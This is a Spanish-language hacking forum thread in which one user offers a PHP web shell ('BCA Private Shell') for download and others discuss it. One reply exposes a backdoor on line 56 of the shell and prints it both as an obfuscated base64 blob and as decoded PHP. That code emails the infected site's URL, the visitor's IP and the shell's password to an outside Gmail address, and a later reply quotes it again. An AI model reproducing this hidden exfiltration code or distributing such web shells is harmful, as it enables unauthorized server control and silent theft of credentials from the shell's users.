Bangladesh Cyber Army Shell (BCA Private Shell)

  • 3 Respuestas
  • 5784 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado craventhegod

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • [C]raven [in]seguridad Informatica

Bangladesh Cyber Army Shell (BCA Private Shell)

  • en: Junio 08, 2013, 04:29:05 pm
buenas tardes, aquí les traigo una shell que espero les guste codeada por Bangladesh Cyber Army :P



 como se ve en la imagen sus funciones son muy directas y automatizadas,




enjoy it :P


solo pegala en un editor de texto plano y guardala como   .php
DESCARGA

You are not allowed to view links. Register or Login
« Última modificación: Noviembre 23, 2014, 02:39:11 pm por Expermicid »
todo es relativo, hasta nuestra existencia :) Shalom

Desconectado StuXn3t

  • *
  • Underc0der
  • Mensajes: 198
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • Twitter: @hackem
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...

Re:Bangladesh Cyber Army Shell (BCA Private Shell)

  • en: Junio 08, 2013, 07:46:43 pm
Interesante, gracias por compartir!!  :D

Saludos!
You are not allowed to view links. Register or Login

Desconectado Andro1de

  • *
  • Underc0der
  • Mensajes: 6
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

Re:Bangladesh Cyber Army Shell (BCA Private Shell)

  • en: Junio 08, 2013, 07:48:46 pm
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Código: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Desconectado morodog

  • *
  • Ex-Staff
  • *****
  • Mensajes: 348
  • Actividad:
    0%
  • Reputación 1
  • Twitter: m4r4d4g
    • Ver Perfil

Re:Bangladesh Cyber Army Shell (BCA Private Shell)

  • en: Junio 09, 2013, 11:13:18 am
You are not allowed to view links. Register or Login
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Código: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Juasss xD no hace falta leer más código xD